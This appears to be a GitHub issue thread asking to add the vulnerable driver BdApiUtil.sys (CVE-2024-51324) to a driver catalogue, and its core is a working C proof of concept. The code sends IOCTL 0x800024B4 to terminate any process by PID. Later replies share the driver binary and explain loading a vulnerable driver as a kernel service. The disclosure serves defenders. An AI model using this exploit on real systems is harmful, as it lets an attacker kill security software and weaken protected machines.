Request to add vulnerable driver BdApiUtil.sys (CVE-2024-51324)

[christopher-ellis-workday]

Was hoping to get BdApiUtil.sys added to this as a vulnerable driver. I wasn't sure the best place to do that, so opened an issue.

Summary:
I found an IOCTL code which takes a PID and terminates it (arbitrary process termination). Admin privileges required to install the driver, but if it's already installed, can be called by any user (non admin).

Here's the specific version I tested against in VT (likely other versions vulnerable too):

http://virustotal.com/gui/file/32198295d2a2700b9895fff999c2b233f9befb0bc175815ec4b71ee926b6edfc

IOCTL needed is 0x800024B4

PoC:

#include <windows.h>
#include <stdio.h>
#include <iostream>

int main() {

	#define IOCTL_TERMINATE_PROCESS 0x800024B4
	#define DEVICE_NAME L"\\\\.\\BdApiUtil"

	unsigned int pid;


	//1. Open a handle to the driver
	HANDLE hDriver = CreateFile(
		DEVICE_NAME,
		GENERIC_READ | GENERIC_WRITE,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);


	if (hDriver == INVALID_HANDLE_VALUE) {
		printf("Error opening device: %d\n", GetLastError());
		return 1;
	}

	//Get the PID of the process to terminate
	printf("PID please : \n");
	scanf_s("%u", &pid);

	//2. Send a code to the driver
	DWORD bytesReturned = 0;
	BYTE outBuffer[256];

	BOOL ioctlResult = DeviceIoControl(
		hDriver,
		IOCTL_TERMINATE_PROCESS,
		&pid,
		sizeof(pid),
		NULL,
		0,
		&bytesReturned,
		NULL
	);

	if (!ioctlResult) {
		printf("Killing IOCTL failed with error: %d\n", GetLastError());
	}
	else {
		printf("DeviceIoControl succeeded.\n");

		//Print the output buffer in hexadecimal
		for (int i = 0; i < bytesReturned; i++) {
			printf("%02X ", outBuffer[i]);
		}
		printf("\n");

		//Print the output as string just in case
		printf("Output Buffer as String: %s\n", outBuffer);
	}


	//Cleanup
	CloseHandle(hDriver);

	std::cout << "sent the IOCTL: " << std::endl;
	std::cout << "Bytes returned: " << bytesReturned << std::endl;
	return 0;
}

[plisskien]

Can I get .sys file?

[christopher-ellis-workday]

I think this will work, hopefully it attaches okay

BdApiUtil.sys.zip

[plisskien]

Thank you a lot for sharing this file, I can confirm vulnerability (I don't get it why ppl still code drivers in this way LOL), but hash from VirtuTotal is different, you should update it.

IOCTL:

NAME:

FUNCTION:

[christopher-ellis-workday]

Ah, thank you. Sorry, I must have grabbed a different version, I've updated the link. I appreciate it

[goaterdd]

hey all, i know this isnt the correct place for this but i do need help with getting a .sys vulnerable gdrv file. the ones i have downloaded were extracted in hex and im not too sure if they work, anyone here have the download to the actual .sys file?

[plisskien]

hey all, i know this isnt the correct place for this but i do need help with getting a .sys vulnerable gdrv file. the ones i have downloaded were extracted in hex and im not too sure if they work, anyone here have the download to the actual .sys file?

If you downloaded it from loldrivers.io just change name from .bin to .sys and create service type kernel and run it, this is what you mean?